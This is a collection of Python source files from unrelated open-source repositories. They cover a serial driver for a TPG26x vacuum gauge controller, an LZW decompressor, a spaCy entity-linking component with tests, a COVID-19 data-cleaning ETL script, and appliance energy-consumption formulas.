"source": "jjj999/tpg26x",
"score": 3
} |
#### File: tpg26x/tpg26x/tpg26x.py
```python
import enum
from functools import cached_property
import io
import typing as t
from serial import Serial
class Mnemonics(bytes, enum.Enum):
ADC = b"ADC"
"""A/D converter test"""
BAU = b"BAU"
"""Baud rate (transmission rate)"""
COM = b"COM"
"""Continuous mode"""
CAL = b"CAL"
"""Calibration factor"""
DCD = b"DCD"
"""Display control digits (display resolution)"""
DGS = b"DGS"
"""Degas"""
DIC = b"DIC"
"""Display control (display changeover)"""
DIS = b"DIS"
"""Display test"""
EEP = b"EEP"
"""EEPROM test"""
EPR = b"EPR"
"""Error status"""
ERR = b"ERR"
"""Error status"""
FIL = b"FIL"
"""Filter time constant (measurement value filter)"""
FSR = b"FSR"
"""Full scale range (measurement range of linear gauges)"""
IOT = b"IOT"
"""I/O test"""
LOC = b"LOC"
"""Keylock"""
OFC = b"OFC"
"""Offset correction (linear gauges)"""
OFD = b"OFD"
"""Offset display (linear gauges)"""
PNR = b"PNR"
"""Program number (firmware version)"""
PR1 = b"PR1"
"""Pressure measurement (measurement data) gauge 1"""
PR2 = b"PR2"
"""Pressure measurement (measurement data) gauge 2"""
PRX = b"PRX"
"""Pressure measurement (measurement data) gauge 1 and 2"""
PUC = b"PUC"
"""Penning underrange control (underrange control)"""
RAM = b"RAM"
"""RAM test"""
RES = b"RES"
"""Reset"""
RST = b"RST"
"""RS232 test"""
SAV = b"SAV"
"""Save parameters to EEPROM"""
SC1 = b"SC1"
"""Sensor control 1 (gauge control 1)"""
SC2 = b"SC2"
"""Sensor control 2 (gauge control 2)"""
SCT = b"SCT"
"""Sensor channel change (measurement channel change)"""
SEN = b"SEN"
"""Sensors on/off"""
SP1 = b"SP1"
"""Setpoint 1 (switching function 1)"""
SP2 = b"SP2"
"""Setpoint 2 (switching function 2)"""
SP3 = b"SP3"
"""Setpoint 3 (switching function 3)"""
SP4 = b"SP4"
"""Setpoint 4 (switching function 4)"""
SPS = b"SPS"
"""Setpoint status (switching function status)"""
TID = b"TID"
"""Transmitter identification (gauge identification)"""
TKB = b"TKB"
"""Keyboard test (operator key test)"""
TLC = b"TLC"
"""Torr lock"""
UNI = b"UNI"
"""Pressure unit"""
WDT = b"WDT"
"""Watchdog control"""
class MeasurementStatus(int, enum.Enum):
OK = 0
UNDERRANGE = 1
OVERRANGE = 2
SENSOR_ERROR = 3
SENSOR_OFF = 4
NO_SENSOR = 5
IDENTIFICATION_ERROR = 6
def _search_measurement_status(value: int) -> t.Optional[MeasurementStatus]:
for status in MeasurementStatus:
if status == value:
return status
return None
class GaugeID(bytes, enum.Enum):
TPR = b"TPR"
"""Pirani Gauge or Pirani Capacitive gauge"""
IK9 = b"IK9"
"""Cold Cathode Gauge 10^-9"""
IKR11 = b"IKR11"
"""Cold Cathode Gauge 10^-11"""
PKR = b"PKR"
"""FullRange CC Gauge"""
PBR = b"PBR"
"""FullRange BA Gauge"""
IMR = b"IMR"
"""Pirani / High Pressure Gauge"""
CMR = b"CMR"
"""Linear gauge"""
NO_SENSOR = b"noSEn"
""""No sensor"""
NO_IDENTIFIER = b"noid"
"""No identifier"""
def _search_gauge_id(value: bytes) -> t.Optional[GaugeID]:
for gauge_id in GaugeID:
if gauge_id == value:
return gauge_id
return None
class GaugeType(bytes, enum.Enum):
GAUGE1 = b"0"
GAUGE2 = b"1"
class ErrorStatus(bytes, enum.Enum):
NO_ERROR = b"0000"
ERROR = b"0000"
NO_HARDWARE = b"0100"
INADMISSIBLE_PARAMETER = b"0010"
SYNTAX_ERROR = b"0001"
def _search_error_status(value: bytes) -> t.Optional[ErrorStatus]:
for status in ErrorStatus:
if status == value:
return status
return None
class ResetErrorStatus(bytes, enum.Enum):
NO_ERROR = b"0"
WATCHDOG_RESPONDED = b"1"
TASK_FAILED = b"2"
EPROM_ERROR = b"3"
RAM_ERROR = b"4"
EEPROM_ERROR = b"5"
DISPLAY_ERROR = b"6"
AD_CONVERTER_ERROR = b"7"
GAUGE1_ERROR = b"9"
GAUGE1_IDENTIFICATION_ERROR = b"10"
GAUGE2_ERROR = b"11"
GAUGE2_IDENTIFICATION_ERROR = b"12"
def _search_reset_error_status(value: bytes) -> ResetErrorStatus:
for status in ResetErrorStatus:
if status == value:
return status
return None
class Tpg26x:
END_OF_TEXT = b"\x03"
CR = b"\x0D"
LF = b"\x0A"
ENQUIRY = b"\x05"
ACK = b"\x06"
NACK = b"\x15"
NEWLINE = CR + LF
def __init__(self, port: str, baudrate: int = 9600) -> None:
self._serial = Serial(port=port, baudrate=baudrate)
self._log_to: t.List[io.TextIOWrapper] = []
def _close(self) -> None:
self._serial.close()
del self
@classmethod
def _format(cls, *args: bytes) -> bytes:
return b",".join(args) + cls.CR + cls.LF
def _write(self, *args: bytes) -> int:
return self._serial.write(self._format(*args))
def enquiry(self) -> None:
self._serial.write(self.ENQUIRY)
def readline(self) -> bytes:
data = self._serial.readline()
if data[-2:] == self.NEWLINE:
return data[:-2]
raise IOError(f"Unrecognizable data was received: {data}")
@classmethod
def _handle_ack(cls, data: bytes, mnemonic: Mnemonics) -> None:
if data == cls.ACK:
return
elif data == cls.NACK:
mnemonic = mnemonic.decode()
raise IOError(f"Mnemonic {mnemonic} was forbiddened by the TPG26x.")
else:
raise IOError(f"Unexpected data was received: {data}")
def send_command(self, mnemonic: Mnemonics, *args: bytes) -> None:
self._write(mnemonic.value, *args)
ack = self.readline()
self._handle_ack(ack, mnemonic)
@staticmethod
def _parse_pressure(raw: bytes) -> float:
# NOTE
# check required
mantissa, exponent = raw.split(b"E")
mantissa = float(mantissa)
exponent = int(exponent)
return mantissa * 10**exponent
@staticmethod
def _parse_measurement(raw: bytes) -> t.Tuple[MeasurementStatus, float]:
status, pressure = raw.split(b",")
status = _search_measurement_status(int(status))
pressure = Tpg26x._parse_pressure(pressure)
return (status, pressure)
@staticmethod
def _parse_measurements(raw: bytes) -> t.Tuple[MeasurementStatus, float, float]:
status, pressure1, pressure2 = raw.split(b",")
status = _search_measurement_status(int(status))
pressure1 = Tpg26x._parse_pressure(pressure1)
pressure2 = Tpg26x._parse_pressure(pressure2)
return (status, pressure1, pressure2)
def _read_gauge(self, mnemonic: Mnemonics) -> t.Tuple[MeasurementStatus, float]:
self.send_command(mnemonic)
self.enquiry()
data = self.readline()
return self._parse_measurement(data)
def read_gauge1(self) -> t.Tuple[MeasurementStatus, float]:
return self._read_gauge(Mnemonics.PR1)
def read_gauge2(self) -> t.Tuple[MeasurementStatus, float]:
return self._read_gauge(Mnemonics.PR2)
def read_both(self) -> None:
self.send_command(Mnemonics.PRX)
self.enquiry()
data = self.readline()
return self._parse_measurements(data)
def _turn_on_off(
self,
gauge1: t.Optional[bool] = None,
gauge2: t.Optional[bool] = None,
) -> None:
if gauge1 is None:
signal1 = b"0"
elif gauge1:
signal1 = b"1"
else:
signal1 = b"2"
if gauge2 is None:
signal2 = b"0"
elif gauge2:
signal2 = b"1"
else:
signal2 = b"2"
self.send_command(Mnemonics.SEN, signal1, signal2)
self.enquiry()
data = self.readline()
status1, status2 = data.split(b",")
if (status1 != signal1) or (status2 != signal2):
raise IOError(
"Gauges cannot be turned on or off.\n"
f"Status: gauge 1 -> {status1}, gauge2 -> {status2}"
)
def turn_on_gauge1(self) -> None:
self._turn_on_off(True, None)
def turn_on_gauge2(self) -> None:
self._turn_on_off(None, True)
def turn_on_both(self) -> None:
self._turn_on(True, True)
def turn_off_gauge1(self) -> None:
self._turn_off(False, None)
def turn_off_gauge2(self) -> None:
self._turn_off(None, False)
def turn_off_both(self) -> None:
self._turn_off(False, False)
def _get_gauge_ids(self) -> t.Tuple[GaugeID, GaugeID]:
self.send_command(Mnemonics.TID)
self.enquiry()
data = self.readline()
id_gauge1, id_gauge2 = map(_search_gauge_id, data.split(b","))
cls = type(self)
cls.id_gauge1.func = lambda _: id_gauge1
cls.id_gauge2.func = lambda _: id_gauge2
return (id_gauge1, id_gauge2)
@cached_property
def id_gauge1(self) -> None:
return self._get_gauge_ids()[0]
@cached_property
def id_gauge2(self) -> None:
return self._get_gauge_ids()[1]
def _change_channel(self, channel: GaugeType) -> GaugeType:
if channel not in {b"0", b"1"}:
raise ValueError(f"'channel' must be 0 or 1 as bytes.")
self.send_command(Mnemonics.SCT, channel)
self.enquiry()
data = self.readline()
return GaugeType.GAUGE1 if data == b"0" else GaugeType.GAUGE2
def change_channel_1(self) -> None:
channel = self._change_channel(GaugeType.GAUGE1)
if channel != GaugeType.GAUGE1:
raise IOError("Measurement channel wasn't changed appropriately.")
def change_channel_2(self) -> None:
chnnel = self._change_channel(GaugeType.GAUGE2)
if chnnel != GaugeType.GAUGE2:
raise IOError("Measurement channel wasn't changed appropriately.")
def get_error_status(self) -> ErrorStatus:
self.send_command(Mnemonics.ERR)
self.enquiry()
data = self.readline()
status = _search_error_status(data)
if status is not None:
return status
raise IOError(f"Unexpected binary was received: {data}")
def reset(self) -> t.List[ResetErrorStatus]:
self.send_command(Mnemonics.RES, b"1")
self.enquiry()
data = self.readline()
return [_search_reset_error_status(s) for s in data.split(b",")]
``` |
{
"source": "JJJados/lzwfile",
"score": 4
} |
#### File: lzwfile/lzwfile/__init__.py
```python
def decompress(file_name):
try:
with open(file_name, 'rb') as fh:
compressed_bytes = fh.read()
except EnvironmentError as err:
raise ValueError(err)
byte_decoder = ByteDecoder(compressed_bytes)
return byte_decoder.decode()
class ByteDecoder:
'''
Takes in a stream of compressed bytes, then decodes and
returns a stream of decompressed bytes.
'''
def __init__(self, compressed_bytes):
self._cb_len = len(compressed_bytes)
self._compressed_bytes = compressed_bytes
self._flags = compressed_bytes[2]
self._max = compressed_bytes[2] & 0x1f
self._prefix = [None] * 65536
self._suffix = [None] * 65536
# Utilized for clearing table, starts at nine bits per symbol
self._bits = 9
self._mask = 0x1ff
self._clear_code = 256
self._err_code_1 = "Compressed data was not created using the Unix Utility"
self._err_code_2 = "Invalid end of stream"
self._err_code_3 = "Invalid code detected"
self._err_code_4 = "First code must be a literal"
def decode(self):
'''
Decompression method based directly off of Mark Adler's C library
for decoding lzw files.
'''
self.ensure_validity()
bits = self._bits
mask = self._mask
end = 256 if self._flags else 255
# Set up: get the first 9-bit code, which is the first ._data byte,
# but don't create a table entry until the next code
buf = self._compressed_bytes[3]
buf += self._compressed_bytes[4] << 8
final = prev = buf & mask
buf >>= bits
left = 16 - bits
if prev > 255:
raise ValueError(self._err_code_4)
table = [final]
mark = 3
next_byte = 5
while next_byte < self._cb_len:
# If the table will be full after this, increment the code size
if (end >= mask) and (bits < self._max):
# Flush unused intable bits and bytes to next 8*bits bit boundary
rem = (next_byte - mark) % bits
if (rem):
rem = bits - rem
if rem >= self._cb_len - next_byte:
break
next_byte += rem
buf = 0
left = 0
mark = next_byte
# increment the number of bits per symbol
bits += 1
mask <<= 1
mask += 1
# Get a code of bits bits
buf += self._compressed_bytes[next_byte] << left
next_byte += 1
left += 8
if left < bits:
if next_byte == self._cb_len:
raise ValueError(self._err_code_2)
buf += self._compressed_bytes[next_byte] << left
next_byte += 1
left += 8
code = buf & mask
buf >>= bits
left -= bits
# process clear code (256)
if code == self._clear_code and self._flags:
rem = (next_byte - mark) % bits
if rem:
rem = bits - rem
if rem > self._cb_len - next_byte:
break
next_byte += rem
buf = 0
left = 0
mark = next_byte
# Go back to nine bits per symbol
bits = self._bits
mask = self._mask
end = 255
continue # get next code
# Process LZW code
temp = code
stack = []
# Special code to reuse last match
if code > end:
if (code != end + 1) or (prev > end):
raise ValueError(self._err_code_3)
stack.append(final)
code = prev
# Walk through linked list to generate outtable in reverse order
while code >= self._clear_code:
stack.append(self._suffix[code])
code = self._prefix[code]
stack.append(code)
final = code
# Link new table entry
if end < mask:
end += 1
self._prefix[end] = prev
self._suffix[end] = final
# Set previous code for next iteration
prev = temp
# Write stack to outtable in forward order
table += stack[::-1]
return bytes(bytearray(table))
def ensure_validity(self):
'''
Processes header and flags to ensure validity of the
compressed data and to ensure it was indeed created
using the lzw compression algorithm
'''
# Process header
if self._cb_len < 3 or self._compressed_bytes[0] != 0x1f or self._compressed_bytes[1] != 0x9d:
raise ValueError(self._err_code_1)
# Ensure flag validity
if self._flags & 0x60:
raise ValueError(self._err_code_1)
if self._max < 9 or self._max > 16:
raise ValueError(self._err_code_1)
elif self._max == 9:
self._max = 10
# True for compressed block
self._flags &= 0x80
# Ensure stream is initially valid
if self._cb_len == 3:
return 0
elif self._cb_len == 4:
raise ValueError(self._err_code_2)
``` |
{
"source": "jjjamie/spacy-ann-linker",
"score": 2
} |
#### File: spacy-ann-linker/spacy_ann/ann_linker.py
```python
from collections import defaultdict
import os
import json
from pathlib import Path
from typing import List, Tuple
import numpy as np
import spacy
from spacy.errors import Errors
from spacy.compat import basestring_
from spacy.language import component
from spacy.kb import Candidate, KnowledgeBase
from spacy.tokens import Doc, Span
from spacy import util
import srsly
from bin.wiki_entity_linking.train_descriptions import EntityEncoder
from spacy_ann.candidate_generator import CandidateGenerator
from spacy_ann.types import KnowledgeBaseCandidate
@component(
"ann_linker",
requires=["doc.ents", "doc.sents", "token.ent_iob", "token.ent_type"],
assigns=["span._.kb_alias"],
)
class AnnLinker:
"""The AnnLinker adds Entity Linking capabilities
to map NER mentions to KnowledgeBase Aliases or directly to KnowledgeBase Ids
"""
@classmethod
def from_nlp(cls, nlp, **cfg):
"""Used in spacy.language.Language when constructing this pipeline.
Tells spaCy that this pipe requires the nlp object
nlp (Language): spaCy Language object
RETURNS (AnnLinker): Initialized AnnLinker.
"""
return cls(nlp, **cfg)
def __init__(self, nlp, **cfg):
"""Initialize the AnnLinker
nlp (Language): spaCy Language object
"""
Span.set_extension("alias_candidates", default=[], force=True)
Span.set_extension("kb_candidates", default=[], force=True)
self.nlp = nlp
self.kb = None
self.cg = None
self.threshold = cfg.get("threshold", 0.7)
self.no_description_threshold = cfg.get("no_description_threshold", 0.95)
self.disambiguate = cfg.get("disambiguate", True)
@property
def aliases(self) -> List[str]:
"""Get all aliases
RETURNS (List[str]): List of aliases
"""
return self.kb.get_alias_strings()
def __call__(self, doc: Doc) -> Doc:
"""Annotate spaCy doc.ents with candidate info.
If disambiguate is True, use entity vectors and doc context
to pick the most likely Candidate
doc (Doc): spaCy Doc
RETURNS (Doc): spaCy Doc with updated annotations
"""
self.require_kb()
self.require_cg()
mentions = doc.ents
mention_strings = [e.text for e in mentions]
batch_candidates = self.cg(mention_strings)
for ent, alias_candidates in zip(doc.ents, batch_candidates):
alias_candidates = [ac for ac in alias_candidates if ac.similarity > self.threshold]
no_definition_alias_candidates = [ac for ac in alias_candidates if ac.similarity > self.no_description_threshold]
ent._.alias_candidates = alias_candidates
if len(alias_candidates) == 0:
continue
else:
if self.disambiguate:
kb_candidates = self.kb.get_candidates(alias_candidates[0].alias)
# create candidate matrix
entity_encodings = np.asarray([c.entity_vector for c in kb_candidates])
candidate_norm = np.linalg.norm(entity_encodings, axis=1)
sims = np.dot(entity_encodings, doc.vector.T) / (
(candidate_norm * doc.vector_norm) + 1e-8
)
ent._.kb_candidates = [
KnowledgeBaseCandidate(entity=cand.entity_, context_similarity=sim)
for cand, sim in zip(kb_candidates, sims)
]
# TODO: Add thresholding here
best_candidate = kb_candidates[np.argmax(sims)]
for t in ent:
t.ent_kb_id = best_candidate.entity
return doc
def set_kb(self, kb: KnowledgeBase):
"""Set the KnowledgeBase
kb (KnowledgeBase): spaCy KnowledgeBase
"""
self.kb = kb
def set_cg(self, cg: CandidateGenerator):
"""Set the CandidateGenerator
cg (CandidateGenerator): Initialized CandidateGenerator
"""
self.cg = cg
def require_kb(self):
"""Raise an error if the kb is not set.
RAISES:
ValueError: kb required
"""
if getattr(self, "kb", None) in (None, True, False):
raise ValueError(f"KnowledgeBase `kb` required for {self.name}")
def require_cg(self):
"""Raise an error if the cg is not set.
RAISES:
ValueError: cg required
"""
if getattr(self, "cg", None) in (None, True, False):
raise ValueError(f"CandidateGenerator `cg` required for {self.name}")
def from_disk(self, path: Path, **kwargs):
"""Deserialize saved AnnLinker from disk.
path (Path): directory to deserialize from
RETURNS (AnnLinker): Initialized AnnLinker
"""
path = util.ensure_path(path)
kb = KnowledgeBase(self.nlp.vocab, 300)
kb.load_bulk(path / "kb")
self.set_kb(kb)
cg = CandidateGenerator().from_disk(path)
self.set_cg(cg)
cfg = srsly.read_json(path / "cfg")
self.threshold = cfg.get("threshold", 0.7)
self.no_description_threshold = cfg.get("no_description_threshold", 0.95)
self.disambiguate = cfg.get("disambiguate", True)
return self
def to_disk(self, path: Path, exclude: Tuple = tuple(), **kwargs):
"""Serialize AnnLinker to disk.
path (Path): directory to serialize to
exclude (Tuple, optional): config to exclude. Defaults to tuple().
"""
path = util.ensure_path(path)
if not path.exists():
path.mkdir()
cfg = {
"threshold": self.threshold,
"no_description_threshold": self.no_description_threshold,
"disambiguate": self.disambiguate
}
srsly.write_json(path / "cfg", cfg)
self.kb.dump(path / "kb")
self.cg.to_disk(path)
```
#### File: spacy-ann-linker/tests/test_api.py
```python
from pathlib import Path
from starlette.requests import Request
from starlette.responses import RedirectResponse
from starlette.testclient import TestClient
import srsly
from spacy_ann.api.app import app
def test_docs_redirect():
client = TestClient(app)
response = client.get('/')
assert response.status_code == 200
assert response.url.split('/')[-1] == "docs"
def test_link(trained_linker):
@app.middleware("http")
async def add_nlp_to_state(request: Request, call_next):
request.state.nlp = trained_linker
response = await call_next(request)
return response
client = TestClient(app)
example_request = srsly.read_json(
Path(__file__).parent.parent / "spacy_ann/api/example_request.json"
)
res = client.post('/link', json=example_request)
assert res.status_code == 200
data = res.json()
for doc in data['documents']:
for span in doc['spans']:
assert 'id' in span
```
#### File: spacy-ann-linker/tests/test_cli.py
```python
from pathlib import Path
import os
import subprocess
import spacy
def test_main():
process = subprocess.Popen([
"spacy_ann"
], stdout=subprocess.PIPE)
process.wait(timeout=10)
assert "Available commands" in str(process.stdout.read())
def test_create_index():
model_path = Path("examples/tutorial/models/ann_linker")
subprocess.run([
"spacy_ann", "create_index", "en_core_web_md", "examples/tutorial/data", "examples/tutorial/models"
])
nlp = spacy.load(model_path)
assert "ann_linker" in nlp.pipe_names
``` |
{
"source": "jjjchens235/covid-compared",
"score": 3
} |
#### File: dags/scripts/covid_pandas.py
```python
import pandas as pd
import numpy as np
import re
from random import randint
import s3fs
class CovidDF():
def __init__(self, df, title, gb, metric):
self.df = df
self.title = title
self.gb = gb
self.metric = metric
class CovidData:
CONFIRMED = 'Confirmed'
DEATHS = 'Deaths'
RECOVERED = 'Recovered'
GB_US = ['country', 'state', 'county']
GB_GLOBAL = ['country', 'state']
cols_to_rename = {'Country_Region': 'country', 'Country/Region': 'country', 'Province_State': 'state', 'Province/State': 'state', 'Admin2': 'county', 'UID': 'location_id', 'Long_': 'lon', 'Long': 'lon'}
def __init__(self):
"""
Initalize each of the dataframes from the 5 John Hopkins time series files
"""
BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series'
us_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_US.csv'
global_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_global.csv'
us_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_US.csv'
global_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_global.csv'
global_recovered_url = f'{BASE_URL}/time_series_covid19_recovered_global.csv'
location_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv'
self.location = CovidDF(pd.read_csv(location_url, error_bad_lines=False), 'location', 'None', 'None')
self.us_confirmed = CovidDF(pd.read_csv(us_confirmed_url, error_bad_lines=False), 'us_confirmed', self.GB_US, self.CONFIRMED)
self.global_confirmed = CovidDF(pd.read_csv(global_confirmed_url, error_bad_lines=False), 'global_confirmed', self.GB_GLOBAL, self.CONFIRMED)
self.us_deaths = CovidDF(pd.read_csv(us_deaths_url, error_bad_lines=False), 'us_deaths', self.GB_US, self.DEATHS)
self.global_deaths = CovidDF(pd.read_csv(global_deaths_url, error_bad_lines=False), 'global_deaths', self.GB_GLOBAL, self.DEATHS)
self.global_recovered = CovidDF(pd.read_csv(global_recovered_url, error_bad_lines=False), 'global_recovered', self.GB_GLOBAL, self.RECOVERED)
self.DFs = [self.us_confirmed, self.global_confirmed, self.us_deaths, self.global_deaths, self.global_recovered]
def clean_time_series(self):
"""
Rename the cols of each dataframe, and rename all values of US -> United States
"""
for DF in self.DFs:
df = DF.df
df.rename(columns=self.cols_to_rename, inplace=True)
df.loc[df['country'] == 'US', 'country'] = 'United States'
def merge_missing_locations(self):
"""
The location file provided has a few missing locations (Yakutat, Alaska and Repatriated Travellers, Canada) as of 1/18/2021
Compare the US and Global confirmed files against the location file and add any missing locations to the location file
"""
#filter for the columns needed for combined key
df_gl = self.global_confirmed.df[['state', 'country', 'Lat', 'lon']]
df_us = self.us_confirmed.df[['state', 'country', 'Lat', 'lon', 'iso2', 'iso3', 'county']]
#create a combined key field in both us and global confirmed
df_gl['combined_key'] = (df_gl['state'] + ', ').fillna('') + df_gl['country']
df_us['combined_key'] = (df_us['county'] + ', ').fillna('') + (df_us['state'] + ', ').fillna('') + df_us['country']
#concat row-wise us and global confirmed
df_concat = pd.concat([df_gl, df_us], axis=0)
#get the missing locations
df_missing = df_concat.loc[~df_concat['combined_key'].isin(self.location.df['combined_key'])]
#create a 6 digit unique id, that's the smallest UID not used in the original location table
df_missing['location_id'] = df_missing.groupby('combined_key')['combined_key'].transform(lambda x: randint(100000, 999999))
df_missing['Population'] = np.nan
df_missing = df_missing[['location_id', 'country', 'state', 'iso2', 'iso3', 'county', 'Population', 'Lat', 'lon', 'combined_key']]
self.location.df = pd.concat([self.location.df, df_missing], axis=0)
def clean_location(self):
""" Clean/update the location dataframe """
df = self.location.df
df = df.rename(columns=self.cols_to_rename)
df = df[['location_id', 'country', 'state', 'iso2', 'iso3','county', 'Population', 'Lat', 'lon']]
df.loc[df['country'] == 'US', 'country'] = 'United States'
#have to manually recreate combined_key field since original field isnt consistently formatted
df['combined_key'] = (df['county'] + ', ').fillna('') + (df['state'] + ', ').fillna('') + df['country']
self.location.df = df
self.merge_missing_locations()
def get_date_cols(self, df):
""" Find the columns that match date regex """
pattern = re.compile(r'\d{1,2}/\d{1,2}/\d{2}')
date_cols = list(filter(pattern.match, df.columns))
return date_cols
def __convert_headers_to_datetime(self, df, date_cols):
"""
Convert the date columns from string -> datetime
"""
date_converted_cols = pd.to_datetime(date_cols, format='%m/%d/%y')
d = dict(zip(date_cols, date_converted_cols))
df = df.rename(columns=d)
return df
def __melt_cols(self, df, id_vars, metric):
""" Melt date columns to rows """
date_cols = self.get_date_cols(df)
cols_to_keep = id_vars + date_cols
df = df[cols_to_keep]
df = self.__convert_headers_to_datetime(df, date_cols)
df = df.melt(id_vars=id_vars, var_name='dt', value_name=metric)
return df
def melt_dfs(self):
""" For each df, melt datetime columns """
for DF in self.DFs:
DF.df = self.__melt_cols(DF.df, id_vars=DF.gb, metric=DF.metric).sort_values(DF.gb)
def __get_daily_totals(self, df, gb, metric):
"""
Converts metric cumsum value to daily values
"""
df['diff'] = df.groupby(gb, dropna=False)[metric].diff()
#fill the first diff value with the original value
#https://stackoverflow.com/questions/25289132/pandas-diff-on-first-records-in-timeseries-missing-data-returns-nan
df[metric] = df['diff'].fillna(df[metric])
df.drop('diff', axis=1, inplace=True)
return df
def get_daily_totals_dfs(self):
""" Converts cumsum totals to daily for all df's """
for DF in self.DFs:
DF.df = self.__get_daily_totals(DF.df, DF.gb, DF.metric)
def add_levels(self):
"""
Update inconsistent territory levels.
For example, China is only by country/state,
while France is by both country/state and country only.
This means that if summing up all the states to get each country's total,
would work for some countries (China),
but would double count for other countries (France)
To fix, this creates a seperate line for each missing level, i.e. create a country line for China
"""
for DF in self.DFs:
df = DF.df
if 'global' in DF.title:
null_countries = df.loc[df['state'].isnull()]['country'].unique()
# roll_countries don't have distinct country line, all their rows include states, i.e China, Aus
roll_countries = df.loc[~df['country'].isin(null_countries)]
#create distinct country line
rolled = roll_countries.groupby(['country', 'dt'])[roll_countries.columns[-1]].sum().reset_index()
rolled.insert(1, 'state', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
else:
rolled = df.loc[df['county'].notnull()].groupby(['country', 'state', 'dt'])[df.columns[-1]].sum().reset_index()
rolled.insert(3, 'county', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
def __save_csv(self, df, path, title, aws_key=None, aws_secret=None):
""" Save csv to either local or S3 """
f = f'{path}{title}_diff.csv'
if aws_key:
s3 = s3fs.S3FileSystem(key=aws_key, secret=aws_secret)
print(f'saving to s3: {f}')
f = s3.open(f, 'w')
print('finished s3 open')
df.to_csv(f, sep='\t', index=False)
def save_csv_local(self):
""" save as local file """
for DF in self.DFs:
self.__save_csv(DF.df, '/Users/jwong/Documents/', DF.title)
def save_csv_s3(self, aws_key, aws_secret, bucket):
""" save to s3 """
for DF in self.DFs:
self.__save_csv(DF.df, bucket, DF.title, aws_key, aws_secret)
#save location
self.__save_csv(self.location.df, bucket, self.location.title, aws_key, aws_secret)
def main(aws_key, aws_secret, bucket):
covid = CovidData()
covid.clean_time_series()
print(covid.us_confirmed.df.head())
covid.clean_location()
covid.melt_dfs()
print('made it to daily total')
covid.get_daily_totals_dfs()
print('made it add_levels')
covid.add_levels()
covid.save_csv_s3(aws_key, aws_secret, bucket)
if __name__ == '__main__':
main()
``` |
{
"source": "jjj-design/pyhees",
"score": 2
} |
#### File: src/pyhees/section10_j1_d.py
```python
def get_E_Elc_washer_d_t(E_Elc_washer_wash_rtd, tm_washer_wash_d_t):
"""時刻別消費電力量を計算する
Parameters
----------
E_Elc_washer_wash_rtd : float
標準コースの洗濯の定格消費電力量,Wh
tm_washer_wash_d_t : ndarray(N-dimensional array)
1年間の全時間の洗濯回数を格納したND配列, 回
d日t時の洗濯回数が年開始時から8760個連続して格納されている
Returns
----------
E_Elc_toilet_seat_heater_d_t : ndarray(N-dimensional array)
1年間の全時間の消費電力量を格納したND配列, Wh
d日t時の消費電力量が年開始時から8760個連続して格納されている
"""
E_Elc_washer_wash = get_E_Elc_washer_wash(E_Elc_washer_wash_rtd)
E_Elc_washer_d_t = E_Elc_washer_wash * tm_washer_wash_d_t
E_Elc_washer_d_t = E_Elc_washer_d_t * 10**(-3)
return E_Elc_washer_d_t
def get_E_Elc_washer_wash(E_Elc_washer_wash_rtd):
"""洗濯時の消費電力量を計算する
Parameters
----------
E_Elc_washer_wash_rtd : float
標準コースの洗濯の定格消費電力量,Wh
Returns
----------
E_Elc_washer_wash : float
1回の洗濯の消費電力量,Wh
"""
E_Elc_washer_wash = 1.3503 * E_Elc_washer_wash_rtd - 42.848
return E_Elc_washer_wash
```
#### File: src/pyhees/section10_j1_h.py
```python
def get_E_Elc_PC_d_t(P_Elc_PC_rtd, t_PC_oprt_d_t):
"""時刻別消費電力量を計算する
Parameters
----------
P_Elc_PC_rtd : float
定格消費電力, W
t_PC_oprt_d_t : ndarray(N-dimensional array)
1年間の全時間の使用時間を格納したND配列, h
d日t時の使用時間が年開始時から8760個連続して格納されている
Returns
----------
E_Elc_PC_d_t : ndarray(N-dimensional array)
1年間の全時間の消費電力量を格納したND配列, kWh
d日t時の消費電力量が年開始時から8760個連続して格納されている
"""
P_Elc_PC_oprt = get_P_Elc_PC_oprt(P_Elc_PC_rtd)
E_Elc_PC_oprt_d_t = P_Elc_PC_oprt * t_PC_oprt_d_t
E_Elc_PC_oprt_d_t = E_Elc_PC_oprt_d_t * 10**(-3)
return E_Elc_PC_oprt_d_t
def get_P_Elc_PC_oprt(P_Elc_PC_rtd):
"""使用時の消費電力を計算する
Parameters
----------
P_Elc_PC_rtd : float
定格消費電力, W
Returns
----------
P_Elc_PC_oprt : float
使用時の消費電力, W
"""
P_Elc_PC_oprt = 1.0871 * P_Elc_PC_rtd + 2.2719
return P_Elc_PC_oprt
```
#### File: src/pyhees/section10_j1_j.py
```python
def get_E_Elc_audio_microsystem_with_md_d_t( \
P_Elc_audio_microsystem_with_md_rtd, \
P_Elc_audio_microsystem_with_md_standby_rtd, \
t_audio_microsystem_with_md_listening_d_t, \
t_audio_microsystem_with_md_standby_d_t):
"""時刻別消費電力量を計算する
Parameters
----------
P_Elc_audio_microsystem_with_md_rtd : float
定格消費電力, W
P_Elc_audio_microsystem_with_md_standby_rtd : float
待機時の定格消費電力, W
t_audio_microsystem_with_md_listening_d_t : ndarray(N-dimensional array)
1年間の全時間の聴取時間を格納したND配列, h
d日t時の聴取時間が年開始時から8760個連続して格納されている
t_audio_microsystem_with_md_standby_d_t : ndarray(N-dimensional array)
1年間の全時間の待機時間を格納したND配列, h
d日t時の待機時間が年開始時から8760個連続して格納されている
Returns
----------
E_Elc_audio_microsystem_with_md_d_t : ndarray(N-dimensional array)
1年間の全時間の消費電力量を格納したND配列, Wh
d日t時の消費電力量が年開始時から8760個連続して格納されている
"""
P_Elc_audio_microsystem_with_md_listening = get_P_Elc_audio_microsystem_with_md_listening(P_Elc_audio_microsystem_with_md_rtd)
P_Elc_audio_microsystem_with_md_standby = get_P_Elc_audio_microsystem_with_md_standby(P_Elc_audio_microsystem_with_md_standby_rtd)
E_Elc_audio_microsystem_with_md_d_t \
= P_Elc_audio_microsystem_with_md_listening * t_audio_microsystem_with_md_listening_d_t \
+ P_Elc_audio_microsystem_with_md_standby * t_audio_microsystem_with_md_standby_d_t
E_Elc_audio_microsystem_with_md_d_t = E_Elc_audio_microsystem_with_md_d_t * 10**(-3)
return E_Elc_audio_microsystem_with_md_d_t
